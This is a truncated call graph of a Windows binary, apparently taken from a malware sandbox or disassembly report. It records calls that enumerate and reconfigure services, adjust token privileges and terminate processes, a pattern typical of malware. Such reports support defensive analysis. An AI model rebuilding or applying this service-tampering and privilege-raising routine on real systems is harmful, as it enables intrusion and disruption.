22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b610 22769->22770 22771 43b5f8 GetLastError 22769->22771 22773 43b61a OpenServiceW 22770->22773 23637 43b48c 17 API calls 22771->23637 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22780 43b696 22778->22780 22781 43b669 Sleep StartServiceW 22778->22781 22779->22156 23640 43b48c 17 API calls 22780->23640 22781->22777 22782 43b686 22781->22782 23639 43b48c 17 API calls 22782->23639 22784 43b63f 22784->22779 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23133 4385cd 23132->23133 23146 4064f4 15 API calls 23132->23146 23133->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23133 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 